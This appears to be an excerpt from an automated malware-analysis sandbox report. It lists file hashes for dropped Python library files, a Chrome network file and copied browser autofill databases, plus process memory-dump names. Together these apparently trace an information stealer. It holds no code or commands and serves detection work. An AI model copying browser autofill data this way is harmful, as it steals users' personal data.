MD5 efe826ee4e05118b050e04fd44da04e1
SHA1 74708eca64365eeaf6f0db3af06470a3136971bf
SHA256 8989b40d16a74e408f117ac964f0498ac807430fb16e1b41fc3783c8397ae165
SHA512 d505b167e8bb9d6f3250cbe4019e11952f004ab6e1691c952f1b0d7a014a2bb84316849ec4413a87ec2fd6f64ff24ee144d9dcb9a70d7e8fe5c4e19af5847c7f

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\quoprimime.py

MD5 91e0134c7993b62df821299cbfe9cf20
SHA1 3e647d829457fc8e76b5d36ed31aff8f383b004f
SHA256 0ac88715c424e80122e3d861bbacc20ee289562f2c685aefe40b88471515a1bd
SHA512 dcc68ced12bc04dc7643fe0b636af764d7136ed203eb1e74e2b669ed6349e62f5fb6022cc86dc03b4824dfb1e8ef5d59ee648dc9d015a0a44641b6cd01eb22d4

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\string.py

MD5 cb7c76d92fe77fceb57279a18afdb96e
SHA1 bc102311785e8912afde553cad6c54a92ea68051
SHA256 34b846ae1458673b9a9026e6300ff0947dd1b3dc374bdd1d126518d8d1a528b2
SHA512 7785afaea59cc3f86f590923c1416832c8aadccb67a589074b8811ba1260257abf3e8d5bf386f9296e4c31d8e69c2886d411d313eb2e4bcdcde794c83a4c3480

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\base64mime.py

MD5 8ae63186399520ccd61e4776409065ff
SHA1 bf485e3b3051eac063e9c69161a542d5072759c9
SHA256 7e499fdefaf71ca3df0cbeb0b3f7b460fdb3cc86ce82ceb5842747dd1687424d
SHA512 51c83054ec515cc2cc1eb467e3afba92820b3f1cb8c4c22345eda38b23db74c6ff6290bcdf8e77eeadcca2183575d70ea5c88962e3b673ac5cec17e595022dc3

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\charset.py

MD5 7d16c9ad3426cd9a469e85b63cd9bf58
SHA1 11db7ca4fc1191e3ee6053b28bdef7c086d5efb6
SHA256 bcf952e8bca0ab984ae06e5d1c8634c7ffff8bd1f02403be3e870325f056d84d
SHA512 ead30dc1068645991516076445c811263a18d033e6dbbf0e1903d0da5192dc4bb0c975d44d1694e91a380a48f5ecffde0483b88a27939467251456f88e9d6282

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\encoders.py

MD5 c5d9853a25ff74dbd71a79494e777276
SHA1 d31b520808c02b931f2f2ec2dc8fbccd11c350d2
SHA256 1cea37bb71b7aac3c7acb98cccc2f17017f7195ffe510a96f0dacaaba856a2c6
SHA512 4249f3889e4b6d944b5a0e1274076313ddf48f89705f2d91b3625a6e59e3a5be1101c83619aa0dd2b27931f77ccd1fc81aba7f3c3fb3b5b215a4c1e5f0f365f2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\autofill_db

MD5 d0150bee5e917cfd7a7152d6c1988919
SHA1 fbcb54efb2fc75f72eaea9605b1a2cae557a121b
SHA256 ea86bc11680540f71d4740429e19804ad5c375e5ceee098981f6aebe691b71c1
SHA512 a3c542917de3538c0a10445f3fd96395cac0f2c572fccc948ed755864d5800af16957d7deb5973a469cde52582d3e3ee6f4d3e87acd7b1084d64441268b2504d

C:\Users\Admin\AppData\Local\Temp\autofill_db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/3408-3705-0x0000000005180000-0x0000000005194000-memory.dmp

memory/3408-3706-0x0000000005680000-0x0000000005692000-memory.dmp

memory/3408-3707-0x0000000005C20000-0x0000000005CBC000-memory.dmp

memory/3408-3708-0x0000000009690000-0x0000000009C34000-memory.dmp

memory/3408-3709-0x0000000005D30000-0x0000000005D96000-memory.dmp

memory/3408-3710-0x0000000009180000-0x0000000009212000-memory.dmp

memory/3408-3711-0x0000000005D20000-0x0000000005D2A000-memory.dmp